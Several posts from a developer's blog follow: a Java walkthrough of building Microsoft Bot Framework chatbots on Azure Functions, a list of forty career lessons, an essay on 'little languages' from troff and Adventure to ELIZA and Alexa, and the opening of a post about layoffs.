My mixed (ok negative) feelings about “quickstarts” go back all the way to the invention of “Wizards” at Microsoft in the early 1990s. They serve a worthy goal, guiding users through a complex process to deliver value quickly. But even in those earliest days, it was clear that the reality was little more than a cheap dopamine hit, mostly good for demos and maybe helping show what’s possible. The problem comes down to two (IMNSHO) fatal flaws:

First, quickstarts abandon users deep in the jungle with a great SUV but no map or driver’s license. Their whole reason to exist is to avoid annoying details and optionality, but that means that the user has no understanding of the context in which the solution was created. How do you change it? What dependencies does it require? How does it fit into your environment? Does it log somewhere? Is it secured appropriately for production? How much will it cost to run? The end result is that people constantly put hacked-up versions of “Hello World” into production and pay for it later when they have no idea what is really going on.

Second, they make developers even lazier than they naturally are anyways. Rather than start with the basics, quickstarts skip most of the hard stuff and lock in decisions that any serious user will have to make for themselves. If this was the start of the documentation, that’d be fine — but it’s usually the end. Instead of more context, the user just gets dropped unceremoniously into auto-generated references that don’t provide any useful narrative. Even worse, existence of the quickstart becomes an excuse for a sloppy underlying interface design (whether that’s an API or menus and dialogs) — e.g., why worry about the steering wheel if people take the test-drive using autopilot?

Anyways, this is really just a long-winded way to say that the Bot Framework quickstart is pretty useless, especially if you’re using Java. Let’s do better, shall we?

What is the Bot Framework?

There are a bunch of SDKs and builders out there for creating chatbots. The Microsoft Bot Framework has been around for a while (launched out of Microsoft Research in 2016) and seems to have pretty significant mindshare. Actually the real momentum really seems to be with no-code or low-code options, which makes sense given how many bots are shallow marketing plays — but I’m jumping right into the SDK here because that’s way more fun, and it’s my blog.

The framework is basically a big normalizer. Your bot presents a standardized HTTPS interface, using the Bot Framework SDK to help manage the various structures and state. The Azure Bot Service acts as a hub, translating messages in and out of various channels (Teams, Slack, SMS, etc.) and presenting them to your interface. Honestly, that’s basically the whole thing. There are additional services to support language understanding and speech-to-text and stuff like that, but it’s all additive to the basic framework.

WumpusBot and RadioBot

I introduced WumpusBot in my last post … basically a chatbot that lets you play a version of the classic 1970s game Hunt the Wumpus. The game logic is adapted from a simplified version online and lives in Wumpus.java, but I won’t spend much time on that. I’ve hooked WumpusBot up to Twilio SMS, so you can give it a try by texting “play” to 706-943-3865.

The project also contains RadioBot, a second chatbot that knows how to interact with the Shutdown Radio service I’ve talked about before. This one is hooked up to Microsoft Teams and includes some slightly fancier interactions — I’ll talk about that after we get a handle on the basics.

Build Housekeeping

All this is hosted in an Azure Function App — so let’s start there. The code is on github. You’ll need git, mvn and a JDK. Build like this:

git clone https://github.com/seanno/shutdownhook.git
cd shutdownhook/toolbox
mvn clean package install
cd ../radio/azure
mvn clean package

To run you’ll need two Cosmos Containers (details in Shutdown Radio on Azure, pay attention to the Managed Identity stuff) and a local.settings.json file with the keys COSMOS_ENDPOINT, COSMOS_DATABASE, COSMOS_CONTAINER and COSMOS_CONTAINER_WUMPUS. You should then be able to run locally using “mvn azure-functions:run.”

Getting a little ahead of myself, but to deploy to Azure you’ll need to update the “functionAppName” setting in pom.xml; “mvn azure-functions:deploy” should work from there assuming you’re logged into the Azure CLI.

The Endpoint

Your bot needs to expose an HTTPS endpoint that receives JSON messages via POST. The Java SDK would really like you to use Spring Boot for this, but it 100% isn’t required. I’ve used a standard Azure Function for mine; that code lives in Functions.java. It really is this simple:

  1. Deserialize the JSON in the request body into an Activity object (line 68).
  2. Pull out the “authorization” header (careful of case-sensitivity) sent by the Bot Framework (line 71).
  3. Get an instance of your “bot” (line 52). This is the message handler and derives from ActivityHandler in WumpusBot.java.
  4. Get an instance of your “adapter.” This is basically the framework engine; we inherit ours from BotFrameworkHttpAdapter in Adapter.java.
  5. Pass all the stuff from steps 1, 2 and 3 to the processIncomingActivity method of your Adapter (line 74).
  6. Use the returned InvokeResponse object to send an HTTPS status and JSON body back down the wire.

All of which is to say, “receive some JSON, do a thing, send back some JSON.” Wrapped up in a million annoying Futures.

The Adapter

The BotAdapter acts as ringmaster for the “do a thing” part of the request, providing helpers and context for your Bot implementation.

BotFrameworkHttpAdapter is almost sufficient to use as-is; the only reason I needed to extend it was to provide a custom Configuration object. By default, the object looks for configuration information in a properties file. This isn’t a bad assumption for Java apps, but in Azure Functions it’s way easier to keep configuration in the environment (via local.settings.json during development and the “Configuration” blade in the portal for production). EnvConfiguration in Adapter.java handles this, and then is wired up to our Adapter at line 34.

The adapter uses its configuration object to fetch the information used in service-to-service authentication. When we register our Bot with the Bot Service, we get an application id and secret. The incoming authentication header (#2 above) is compared to the “MicrosoftAppId” and “MicrosoftAppSecret” values in the configuration to ensure the connection is legitimate.

Actually, EnvConfiguration is more complicated than would normally be required, because I wanted to host two distinct bots within the same Function App (WumpusBot and RadioBot). This requires a way to keep multiple AppId and AppSecret values around, but we only have one System.env() to work with. The “configSuffix” noise in my class takes care of that segmentation.

There are a few other “providers” you can attach to your adapter if needed. The most common of these is the “AuthenticationProvider” that helps manage user-level OAuth, for example if you want your bot to access a user’s personal calendar or send email on their behalf. I didn’t have any need for this, so left the defaults alone.

Once you get all this wired up, you can pretty much ignore it.

The Bot

Here’s where the fun stuff starts. The Adapter sets up a TurnContext object and passes it to the onTurn method of your Bot implementation. The default onTurn handler is really just a big switch on the ActivityType (MESSAGE, TYPING, CONVERSATION_UPDATE, etc.) that farms out calls to type-specific handlers. Your bot can override any of these to receive notifications on various events.

The onMessageActivity method is called whenever your bot receives a (duh) message. For simple text interactions, simply call turnContext.getActivity().getText() to read the incoming text, and turnContext.sendActivity(MessageFactory.text(responseString)) to send back a response.
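
Give or take exact signatures (and the ever-present CompletableFutures), a minimal message handler looks something like this. It’s a sketch built from the calls described above, so double-check package names against the SDK docs:

import java.util.concurrent.CompletableFuture;
import com.microsoft.bot.builder.ActivityHandler;
import com.microsoft.bot.builder.MessageFactory;
import com.microsoft.bot.builder.TurnContext;

public class EchoBot extends ActivityHandler {

    // Called by the adapter whenever a MESSAGE activity arrives
    @Override
    protected CompletableFuture<Void> onMessageActivity(TurnContext turnContext) {
        String incoming = turnContext.getActivity().getText();
        return turnContext
            .sendActivity(MessageFactory.text("you said: " + incoming))
            .thenApply(sendResult -> null);
    }
}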

The Bot Framework has tried to standardize on markdown formatting for text messages, but support is spotty. For example Teams and WebChat work well, but Skype and SMS just display messages as raw text. Get used to running into this a lot — normalization across channels is pretty hit or miss, so for anything complex you can expect to be writing channel-specific code. This goes for conversation semantics as well. For example from my experience so far, the onMembersAdded activity:

  • Is called in Teams right away when the bot enters a channel or a new member joins;
  • Is called in WebChat only after the bot receives an initial message from the user; and
  • Is never called for Twilio SMS conversations at all.

Managing State

Quirks aside, for a stateless bot, that’s really about all there is to it. But not all bots are stateless — some of the most useful functionality emerges from a conversation that develops over time (even ELIZA needed a little bit of memory!). To accomplish that you’ll use the significantly over-engineered “BotState” mechanism you see in use at WumpusBot.java line 57. There are three types of state:

  • UserState: scoped to a user, across all of their conversations.
  • ConversationState: scoped to a conversation, shared by everyone in it.
  • PrivateConversationState: scoped to a specific user within a specific conversation.

All of these are the same except for the implementation of getStorageKey, which grovels around in the turnContext to construct an appropriate key to identify the desired scope.

The state object delegates actual storage to an implementation of a CRUD interface. The framework implements two versions, one in-memory and one using Cosmos DB. The memory one is another example of why quickstarts are awful — it’s easy, but is basically never appropriate for the real world. It’s just a shortcut to make the framework look simpler than it really is.

The Cosmos DB implementation is fine except that it authenticates using a key. I wanted to use the same Managed Identity I used elsewhere in this app already, so I implemented my own in Storage.java. I cheated a little by ignoring “ETag” support to manage versioning conflicts, but I just couldn’t make myself believe that this was going to be a problem. (Fun fact: Cosmos lets you create items with illegal id values, but then you can’t ever read or delete them without some serious hackage. That’s why safeKey exists.)

Last and very important if you’re implementing your own Storage — notice the call to enableDefaultTyping on the Jackson ObjectMapper. Without this setting, the ObjectMapper serializes to JSON without type information. This is often OK because you’re either providing the type directly or the OM can infer reasonably. But the framework’s state map is polymorphic (it holds Objects), so these mechanisms can’t do the job. Default typing stores type info in the JSON so you get back what you started with.
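
In Jackson terms, the setup looks something like this (a sketch; newer Jackson versions deprecate this call in favor of activateDefaultTyping with a type validator):

import com.fasterxml.jackson.databind.ObjectMapper;

public class StateMapperFactory {

    // Build an ObjectMapper that embeds type information in the JSON, so the
    // polymorphic state map (it holds Objects) round-trips back into real
    // classes instead of generic maps.
    public static ObjectMapper create() {
        ObjectMapper mapper = new ObjectMapper();
        mapper.enableDefaultTyping(ObjectMapper.DefaultTyping.NON_FINAL);
        return mapper;
    }
}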

Once you have picked your scope and set up Storage, you can relatively easily fetch and store state objects (in my situation a WumpusState) with this pattern:

  1. Allocate a BotState object in your Bot singleton (line 39).
  2. Call getProperty in your activity handler to set up a named property (line 57).  
  3. Fetch the state using the returned StatePropertyAccessor and (ugh) wait on the Future (lines 58-60). Notice the constructor here which is used to initialize the object on first access.  
  4. Use the object normally.
  5. Push changes back to storage before exiting your handler (line 68). Change tracking is implicit, so be sure to update state in the specific object instance you got in step #3. This is why Wumpus.newGame() never reallocates a WumpusState once it’s attached.

Testing your Bot Locally

Once you have your Function App running and responding to incoming messages, you can test it out locally using the Bot Framework Emulator. The Emulator is a GUI that can run under Windows, Mac or Linux (in X). You provide your bot’s endpoint URL (e.g., http://localhost:7071/wumpus for the WumpusBot running locally with mvn azure-functions:run) and the app establishes a conversation that includes a bunch of nifty debugging information.

Connecting to the Bot Service

The emulator is nice because you can manage things completely locally. Testing with the real Bot Service gets a little more complicated, because it needs to access an Internet-accessible endpoint.

All of the docs and tutorials have you do this by running yet another random tool. ngrok is admittedly kind of cute — it basically just forwards a port from your local machine to a random url like https://92832de0.ngrok.io. The fact that it can serve up HTTPS is a nice bonus. So if you’re down for that, by all means go for it. But I was able to do most of my testing with the emulator, so by the time I wanted to see it live, I really just wanted to see it live. Deploying the function to Azure is easy and relatively quick, so I just did that and ended up with my real bot URL: https://shutdownradio.azurewebsites.net/wumpus.

The first step is to create the Bot in Azure. Search the portal for “Azure Bot” (it shows up in the Marketplace section). Give your bot a unique handle (I used “wumpus”) and pick your desired subscription and resource group (fair warning — most of all this can be covered under your free subscription plan, but you might want to poke around to be sure you know what you’re getting into). Java bots can only be “Multi Tenant” so choose that option and let the system create a new App ID.

Once creation is complete, paste your bot URL into the “Messaging Endpoint” box. Next copy down the “Microsoft App Id” value and click “Manage” and then “Certificates & secrets.” Allocate a new client secret since you can’t see the value of the one they created for you (doh). Back in the “Configuration” section of your Function app, add these values (remember my comment about “configSuffix” at the beginning of all this):

  • MicrosoftAppId_wumpus (your app id)
  • MicrosoftAppSecret_wumpus (your app secret)
  • MicrosoftAppType_wumpus (“MultiTenant” with no space)

If you want to run RadioBot as well, repeat all of this for a new bot using the endpoint /bot and without the “_wumpus” suffixes in the configuration values.

Congratulations, you now have a bot! In the Azure portal, you can choose “Test in Web Chat” to give it a spin. It’s pretty easy to embed this chat experience into your web site as well (instructions here).

You can use the “Channels” tab to wire up your bot to additional services. I hooked Wumpus up to Twilio SMS using the instructions here. In brief:

  • Sign up for Twilio and get an SMS number.
  • Create a “TwiML” application on their portal and link it to the Bot Framework using the endpoint https://sms.botframework.com/api/sms.
  • Choose the Twilio channel in the Azure portal and paste in your TwiML application credentials.

That’s it! Just text “play” to 706-943-3865 and you’re off to the races.

Bots in Microsoft Teams

Connecting to Teams is conceptually similar to SMS, just a lot more fiddly.

First, enable the Microsoft Teams channel in your Bot Service configuration. This is pretty much just a checkbox and confirmation that this is a Commercial, not Government, bot.

Next, bop over to the Teams admin site at https://admin.teams.microsoft.com/ (if you’re not an admin you may need a hand here). Under “Teams Apps” / “Setup Policies” / “Global”, make sure that the “Upload custom apps” slider is enabled. Note if you want to be more surgical about this, you can instead add a new policy with this option just for developers and assign it to them under “Manage Users.”

Finally, head over to https://dev.teams.microsoft.com/apps and create a new custom app. There are a lot of options here, but only a few are required:

  • Under “Basic Information”, add values for the website, privacy policy and terms of use. Any URL is fine for now, but they can’t be empty, or you’ll get mysterious errors later.
  • Under “App Features”, add a “Bot.” Paste your bot’s “Microsoft App Id” (the same one you used during the function app configuration) into the “Enter a Bot ID” box. Also check whichever of the “scope” checkboxes are interesting to you (I just checked them all).

Save all this and you’re ready to give it a try. If you want a super-quick dopamine hit, just click the “Preview in Teams” button. If you want to be more official about it, choose “Publish” / “Publish to org” and then ask your Teams Admin to approve the application for use. If you’re feeling really brave, you can go all-in and publish your bot to the Teams Store for anyone to use, but that’s beyond my pay grade here. Whichever way you choose to publish, once the app is in place you can start a new chat with your bot by name, or add them to a channel by typing @ and selecting “Get Bots” in the resulting popup. Pretty cool!

A caveat about using bots in channels: your bot will only receive messages in which they are @mentioned, which can be slightly annoying but net net probably makes sense. Unfortunately though, it is probably going to mess up your message parsing, because the mention is included in the message text (e.g., “<at>botname</at> real message.”). I’ve coded RadioBot to handle this by stripping out anything between “at” markers at line 454. Just another way in which you really do need to know what channel you’re dealing with.
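
The stripping itself is simple, something along these lines (a sketch, not the actual code at line 454):

// Turn "<at>botname</at> play some music" into "play some music"
static String stripMentions(String text) {
    return text.replaceAll("(?i)<at>.*?</at>", "").trim();
}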

Teams in particular has a whole bunch of other capabilities and restrictions beyond what you’ll find in the vanilla Bot Framework. It’s worth reading through their documentation and in particular being aware of the Teams-specific stuff you’ll find in TeamsChannelData.

We made it!

Well that was a lot; kind of an anti-quickstart. But if you’ve gotten this far, you have a solid understanding of how the Bot Framework works and how the pieces fit together, start to finish. There is a bunch more we could dig into (for instance check out the Adaptive Card interfaces in RadioBot here and here) — but we don’t need to, because you’ll be able to figure it out for yourself. Teach a person to fish or whatever, I guess.

Anyhoo, if you do anything cool with this stuff, I’d sure love to hear about it, and happy to answer questions if you get stuck as well. Beyond that, I hope you’ll enjoy some good conversations with our future robot overlords, and I’ll look forward to checking in with another post soon!

Forty for Forty

I really was born at exactly the right time to ride the golden age of computing. When I was in high school and college, computers were powerful enough to impact every corner of our world, but simple enough that actual humans could still develop a connection to the metal. I surfed those years straight into the cradle of 1990s computing — classic Macintoshes, Windows 3.0 and 95, the early Internet, Linux; so much great stuff and the perfect setup for twenty years trying to solve big problems in healthcare.

And so many incredible people, most of them way smarter than me. I do a fair bit of mentoring these days, and honestly 99% of it is just sharing stuff others have taught me. I’m completely serious; my problem-solving toolbox basically boils down to imagining what somebody smart I’ve known would do. And it works great!

So I thought I’d share a few particularly valuable gems here — forty lessons for the (a few more than) forty years I’ve been in the game. I present each with minimal context — not quite bumper stickers but sometimes close. Attributions are real initials; feel free to make your guesses!

  1. It’s never the operating system. (DO)
  2. You can understand any system if you start with main. (BA)
  3. Design the object model first. (UM)
  4. Good code is fun to read. (JB)
  5. Don’t spawn that thread. (CC)
  6. When you’re stuck, just look again — eventually you’ll see it. (DS)
  7. If you’re fixing the most bugs, you probably wrote the most bugs. (BS)
  8. The worst case probably isn’t that bad. (BB)
  9. Comments lie. (DS)
  10. People don’t think asynchronously. (SN)
  11. Take your annual review seriously for one hour and then stop. (PK)
  12. Aircraft carriers turn slowly, but sometimes you need one. (PN)
  13. Meetings are a waste of time. (EJ)
  14. Perception is reality. (TL)
  15. You might actually be the smartest person in the room. (KC)
  16. Code Talks. (PK)
  17. Implement a memory manager once before you die. (JL)
  18. Walkthroughs are better testing than testing. (UM)
  19. Obvious to you isn’t obvious to everyone (so speak up). (PN)
  20. Don’t be clever. (JB)
  21. Never override a no-hire. (AC)
  22. If you don’t understand the details then you don’t understand. (BG)
  23. Have a single source of truth. (SN)
  24. There’s always one more bug. (RH)
  25. If you want to be a manager, you probably shouldn’t be one. (PK)
  26. Most problems can be solved with Excel. (GE)
  27. No secret lists. (LW)
  28. Honest != a$$hole. (KC)
  29. Adding more developers won’t help. (FB)
  30. Don’t lower your bet. (DN)
  31. How hard can it be? (JL)
  32. Outsourcing costs more than it saves. (SN)
  33. SQL is smarter than you think. (BD)
  34. Write it twice. (UM)
  35. Data wins debates. (TC)
  36. After a win, always take something off the table. (RN)
  37. Make it hard to do the wrong thing. (IA)
  38. Leaky abstraction is worse than no abstraction. (UM)
  39. It has to work first. (DK)
  40. Take the win, Sean. (AM)

You are in a maze of twisty little languages, all alike.

It seems like everywhere I go these days I’m talking to a bot. Now don’t get me wrong, I’m all for technology that keeps me from having to interact with actual humans. And truth be told, they’re getting pretty good — talking to Alexa has just become something I do without thinking about it. But it super-annoys me when I visit some random website and their chatbot pops up in my face pretending to be a real person (I’m looking at you, oreilly.com).

I think it’s good for us to know when we’re talking to a computer and when we’re not. And that’s not only some squishy ethical thing — it just works better. I have different expectations talking to a bot than I do to a human, and I’m more than happy to adjust my speaking pattern to increase the chances of success. For example, I know that “shuffle” and “album” are Alexa keywords for music, so I ask her to “shuffle album Cake and Pie” (which works) rather than “please play Cake and Pie in random order” (sad Alexa noise).

And you know what? This is fine! Speech recognition aside (amazing stuff there), we use specialized and restricted dialects for specialized purposes all the time, even between humans. Curlers yell “clean” or “hurry” and the sweepers immediately know what they mean. I tell the guy at the lumber yard that I put “16 feet of 2×12 treated” into my car and he knows what to charge me. This kind of jargon removes ambiguity from communication, and that’s a big plus when you’re trying to get something done together.

So what’s my point? There’s an interesting dichotomy here, because the hype around chatbots is all about artificial intelligence, but the reality is that it’s much more about the creation of purpose-built “little languages.” Those are way more interesting to me, so that’s what I’m going to dig into today.

Little Languages

Jon Bentley wrote an incredible pair of books in Programming Pearls and More Programming Pearls. Both are essential reading for anyone who cares about software, even though some (not all!) of the specific technology is showing its age. They’re entertaining too, thanks to the way he weaves together anecdotes and concrete code. What I’m saying here is, buy the books.

Anyways, I first encountered “little languages” in More Programming Pearls, but you can read the original article about them online here. Bentley was part of the UNIX crowd at Bell Labs and loved (as all good programmers do) the idea of pipelines — how programs can work together to do increasingly complex things (really just top-down-design in different clothes, but since pretty much all problems converge back to TDD that’s cool by me). In the article, he demonstrates the concept using picture generators that used to be (maybe still are?) commonly used for technical papers. For example, the chem language allows folks to concisely describe and depict chemical structures. Here’s LSD:

.cstart
B:  benzene pointing right
F:  flatring5 pointing left put N at 5 double 3,4 with .V1 at B.V2
    H below F.N
R:  ring pointing right with .V4 at B.V6
    front bond right from R.V6 ; H
R:  ring pointing right with .V2 at R.V6 put N at 1 double 3,4
    bond right from R.N ; CH3
    back bond -60 from R.V5 ; H
    bond up from R.V5 ; CO
    bond right ; N(C2H5)2
.cend

You can run this yourself on most Linux systems; if it’s not there already, use your package manager to install groff (groff is the GNU version of the typesetting app troff). Save the code above as lsd.chem and use the command:

cat lsd.chem | chem | pic | groff -Tpdf > lsd.pdf

This has always stuck with me because it’s such a beautiful specialized-to-generic pipeline:

  • chem lets you easily specify chemical structures, generating input for
  • pic, which creates any kind of picture, generating input for
  • groff, which formats any kind of document for presentation.

Adventure

Bentley’s little languages are primarily static, used as input to an interpreter. But the concept applies equally well to conversations, and we’ve been having conversations with computers for a long time. Exhibit A is Colossal Cave Adventure, the granddaddy of “interactive fiction.” If you had access to a computer in the seventies or eighties there’s a 100% chance you played it or one of its descendants like Zork or the early Roberta Williams titles. Interactive fiction today generally uses point-and-click, but you can very much still feel the connection to their early, text-based ancestors.

In Adventure, the computer acts as a dungeon master, describing your location and acting on your instructions (“go north”, “take lamp”, “fight dragon,” and so on). Your goal is to explore a network of underground caves (based on the real Mammoth Cave), accumulating gold and treasure along the way. You can give it a try yourself in the browser — I recommend keeping track of where you are by building up a map on paper along the way.

There are a million versions of the game. The one I first played was written by Don Woods as a modification of the original by Will Crowther. The FORTRAN code for the original Crowther version is on github (of course it is). The “little language” implemented there is shockingly expressive given its tiny vocabulary of 192 words.

  • In the GETIN subroutine, an input line is broken into one or two words: a VERB and an optional OBJECT. Each is truncated to five characters for processing, but extra characters are retained for display purposes.
  • Starting at label 2020, the words are matched to entries in the 192-word vocabulary table which are implicitly associated with classes (motion/action/special for verbs, normal/treasure for objects) based on their assigned number.
  • The verb is then dispatched to the correct handler. Most action verbs are handled using special-case logic, but motion verbs run through a state machine defined in the motion table. If you think about the cave as a graph, each row in the motion table is an edge that describes the verbs and game state required to move the player from the location in the first column to the location in the second. (A tiny Java sketch of this idea follows below.)
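
Here's a toy Java rendition of the motion-table idea. It's nothing like the real FORTRAN, and the rooms and verbs are invented, but it shows how a few data rows become a tiny language of their own:

import java.util.List;
import java.util.Optional;

public class MotionTable {
    // Each rule is an edge in the cave graph: "verb X in room FROM moves you to room TO".
    record Rule(String from, String verb, String to) {}

    // A hypothetical three-room cave, nothing to do with the real game data.
    static final List<Rule> RULES = List.of(
        new Rule("road", "north", "hill"),
        new Rule("road", "enter", "building"),
        new Rule("building", "out", "road"));

    static Optional<String> move(String room, String verb) {
        return RULES.stream()
                    .filter(r -> r.from().equals(room) && r.verb().equals(verb))
                    .map(Rule::to)
                    .findFirst();
    }

    public static void main(String[] args) {
        System.out.println(move("road", "enter").orElse("You can't go that way."));  // building
    }
}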

Of course there’s a lot more to it than that. If you want to really dig into the code, there is a well-commented copy of the Woods version at the Interactive Fiction Archive, downloadable as a zipped tarball. You’ll still have to brush up on your FORTRAN to really get it, but who doesn’t love a good DO/CONTINUE loop packed with GOTO statements?

If you’ve played the game, it’s impossible not to be impressed with how immersive it is. With nothing more than VERB/OBJECT pairs, you can explore a world, solve puzzles, and even kill a dragon (with what? your bare hands?). I hope you get so sucked into the cave that you don’t come back to this post for a month.

Late breaking news: turns out this post is pretty timely, because Ken and Roberta Williams just announced that they are rebooting Colossal Cave for a new generation of folks … WOOT!

ELIZA the DOCTOR

Rogerian psychology is serious stuff. In (very) short, the goal is to help patients understand themselves through a self-driven, internal dialogue. The therapist is there to provide safety and empathy, and to reflect back the observations and themes they are hearing. It has helped millions of people. But it’s also the easy butt of jokes, because on the surface it seems that the therapist isn’t really doing anything:

  • How many Rogerian therapists does it take to change a lightbulb?
  • I hear you wanting to know how many Rogerian therapists it takes to change a lightbulb.

Way back in 1965, Joseph Weizenbaum created ELIZA and DOCTOR, an engine and script respectively that do a remarkably good job of emulating a conversation with that satirized therapist. If you’ve never heard of ELIZA, you definitely should click on over to this site and say hello to her; she’s actually pretty impressive, especially when you consider that there is absolutely zero contextual “understanding” under the covers.

ELIZA’s little language is quite different from Adventure’s. Her goal is to transform input into responses that will seem relevant and appropriate to a human observer, especially one primed to expect a Rogerian conversation. The original source is available, but it’s written in MAD-SLIP and that one is even too arcane for me. Instead I’ll refer to Weizenbaum’s original paper in the ACM which is pretty great and totally worth reading.

The language is primarily defined by rules for recognizing input patterns and transforming them into responses. For example, suppose we receive the input “why do you hate me” and want to respond with “Why do you think I hate you.”

  1. The decomposition rule (0 you 0 me) is matched against the input. It’s basically a proto-regex. The number 0 means “match any 0 or more words,” while the alphabetic strings must match exactly. If the pattern matches, each section of the rule is “assigned” text from the input. In this case it would match as ((why do) (you) (hate) (me)).
  2. An associated recomposition rule (why do you think I 3 you) is used as a template to generate the response. Numbers are replaced with the Nth input grouping generated during decomposition (3 = “hate” in this example) to create the desired response: why do you think I hate you? (A minimal sketch of this match-and-fill step follows below.)
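
Here's a minimal Java sketch of that match-and-fill mechanic: a single hardcoded rule pair, nowhere near the real engine, but enough to see how the pieces fit:

import java.util.regex.Matcher;
import java.util.regex.Pattern;

public class ElizaSketch {
    // The decomposition rule (0 YOU 0 ME): each "0" becomes a wildcard capture group.
    private static final Pattern DECOMP =
        Pattern.compile("(.*)\\byou\\b(.*)\\bme\\b.*", Pattern.CASE_INSENSITIVE);

    public static String respond(String input) {
        Matcher m = DECOMP.matcher(input);
        if (!m.matches()) return "Please go on.";  // fallback rule when nothing matches

        // The recomposition rule (WHY DO YOU THINK I 3 YOU): "3" is the third chunk of
        // the decomposition, which is capture group 2 here since "you" itself isn't captured.
        return "Why do you think I" + m.group(2) + "you?";
    }

    public static void main(String[] args) {
        System.out.println(respond("why do you hate me"));  // Why do you think I hate you?
        System.out.println(respond("You love me"));         // Why do you think I love you?
    }
}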

Note that even this simple pair of rules provides significant flexibility in our ability to respond to arbitrary input:

  • Why do you hate me / Why do you think I hate you
  • It seems that you no longer care about me / Why do you think I no longer care about you
  • You love me / Why do you think I love you
  • Apparently you are bananas for me / Why do you think I are bananas for you

Whoops! That last one uncovered a flaw in our engine — the second person singular “are” should have been transformed into the first person singular “am.” ELIZA uses additional rules called transforms to fix this up. There are also a bunch of other interesting details that make her respond in a mostly-believable way; a few examples:

  • Decomposition rules can have multiple possible recomposition rules; ELIZA selects from the list randomly but with minimal repetition.
  • Decomposition rules are associated with keywords that have a ranked order. In this way, more specific or interesting responses can be preferred over simpler ones. (This keyword-to-rule association was created primarily as a performance benefit to account for the limited processing power of the day, but the ranking is a nice side benefit.)
  • Fallback rules keep the conversation moving when no decomposition rules match successfully.
  • A “memory” feature keeps a short stack of important phrases used in the conversation that can be inserted to enhance a sense of continuity.

The actual syntax used to express the language is pretty hairy — basically a nest of parenthesized lists, just as you’d expect from a LISP variant. Here’s a short snip from DOCTOR that I’ve indented to be a tiny bit more readable; the full script is included at the end of the paper:

(CANT = CAN'T)
(WONT = WON'T)
(REMEMBER 5 
	((0 YOU REMEMBER 0) 
		(DO YOU OFTEN THINK OF 4)
		(DOES THINKING OF 4 BRING ANYTHING ELSE TO MIND)
		(WHAT ELSE DO YOU REMEMBER)
		(WHY DO YOU REMEMBER 4 JUST NOW)
		(WHAT IN THE PRESENT SITUATION REMINDS YOU OF 4)
		(WHAT IS THE CONNECTION BETWEEN ME AND 4))

It turns out that Charles Hayden reimplemented ELIZA in Java and dramatically improved the little language. But aesthetics aside, just like Adventure, the ELIZA script language packs a great deal of smarts into a quite restricted syntax. Truth be told, I’d much rather talk to her than to most of the marketing bots that get up in my face on the web every day.

Today’s Conversation Models

Modern little languages certainly look fancier than these early examples. If you’ve been reading this blog for awhile, you may recall my experience writing an Alexa “skill” to manage stuff in my house. I won’t repeat all the details here, but in short an Alexa “Interaction Model” includes the following elements (sketched roughly after the list):

  • Intents: things that the user wants to do (e.g. turn on a particular configuration of lights).
  • Utterances: one or more template phrases that capture an intent (e.g., “turn family room lights on”).
  • Slots: placeholders in an utterance that capture meaningful parameters in the user’s request (e.g., “turn ROOM_SLOT ACTION_SLOT”).
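
For flavor, a fragment of that model in the skill's JSON definition looks roughly like this (the intent, slot and utterance names are made up for illustration):

{
  "interactionModel": {
    "languageModel": {
      "invocationName": "house lights",
      "intents": [
        {
          "name": "LightsIntent",
          "slots": [
            { "name": "Room", "type": "ROOM_TYPE" },
            { "name": "Action", "type": "ACTION_TYPE" }
          ],
          "samples": [
            "turn {Room} lights {Action}",
            "turn {Room} {Action}"
          ]
        }
      ]
    }
  }
}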

Azure provides basically the same functionality in its Conversational Language Understanding suite (this is a new version of what used to be LUIS; it’s hard to keep up).

Feeling a little Deja Vu? Intents are basically ELIZA keywords. Utterances are decomposition rules. Slots are the numeric placeholders used in recomposition. It’s actually kind of startling just how similar they are. Of course there’s a ton of advanced processing now that notably improves the matching process — it would be wrong to minimize the advances there. But let’s give the old guys some credit, hey?

Hunt the Wumpus (by Text!)

When I started writing this article, the plan was to go pretty deep into the details of implementing a “bot” using the Microsoft Bot Framework. But as I look up from the keyboard, I’m two thousand words in already and haven’t even started that … so maybe better to save it for next time. But I’d hate to leave you without at least a little something concrete, so let’s introduce the WumpusBot and give it a spin.

Hunt the Wumpus is actually the very first computer game I ever played, over a printing teletype connected from my elementary school to a central PDP-11 somewhere. The goal is to explore a series of connected rooms, trying to shoot the “Wumpus” before he eats you or you fall into a bottomless pit. Along the way, bats may pick you up and move you randomly to another room. In the original game, you had magic “crooked arrows” that could travel between many rooms, but I chose to implement the simpler version described here where you can just shoot into any adjacent room.
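
If you're curious how little state the game really needs, here's a toy sketch of the core rule (not the real Wumpus.java, and the cave layout here is invented): the rooms form a graph, and you can only shoot next door.

import java.util.Map;
import java.util.Set;

public class WumpusSketch {
    // Just a few rooms of a hypothetical cave, for illustration; in the classic game
    // every room connects to exactly three others.
    static final Map<Integer, Set<Integer>> CAVE = Map.of(
        1, Set.of(2, 5, 8),
        2, Set.of(1, 3, 10),
        3, Set.of(2, 4, 12));

    static String shoot(int playerRoom, int targetRoom, int wumpusRoom) {
        if (!CAVE.getOrDefault(playerRoom, Set.of()).contains(targetRoom)) {
            return "You can only shoot into an adjacent room.";
        }
        return targetRoom == wumpusRoom ? "You got the Wumpus!" : "Missed... and now he's awake.";
    }

    public static void main(String[] args) {
        System.out.println(shoot(1, 2, 2));  // You got the Wumpus!
    }
}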

Anyways, take out your trusty smartphone and text “play” to 706-943-3865 to give it a try for real. WumpusBot will reply with some instructions to get you started — its language is little indeed, pretty much just “move” and “shoot.”

The game logic is in Wumpus.java, and the bot innards are all in this directory. The cool thing about the Bot Framework is that it can multiplex your logic across a ton of “channels” — web chat, SMS, Teams, Slack, Facebook, and a bunch more; WumpusBot itself is really just that game logic wrapped in a thin Bot Framework shell.

Anyways, for now just enjoy the game — we’ll get into the details and the usual Microsoft devex bashing next time. Pro tip: whenever you feel a draft or smell something rotten, just backtrack and approach from a different room … unless a bat does you wrong, you’ll get him every time.

Layoffs Suck… for Everyone

My first experience with layoffs came during the dot-com bust in early 2001. I’d helped to build a company called drugstore.com during the boom period — we had a remarkable team full of insanely great people. The mission in those early days was simple: (1) get big fast to establish merchandizing power; (2) use technology to create a barrier to entry for traditional players. Money was easy, and we went all-in on both fronts. My contributions were mostly technical — and we did a ton. The first persistent shopping cart, wishlists and auto-replenishment, promotions and affiliates, live order and inventory status, pill robots — stuff that seems routine now. But back then there was just our team, the VC++ compiler and rack upon rack of 1U servers down in Renton. Some great times.

Hindsight is easy, but I still maintain with a straight face that if the money had lasted just a couple of more years we would have made it over the hump. Of course I think we were “special,” but who knows. Anyways, that clearly did not happen and pretty much overnight we were looking at a misaligned company with limited cash, limited revenue and enormous operating costs. That meant layoffs — and it was the f*cking worst. For everyone.

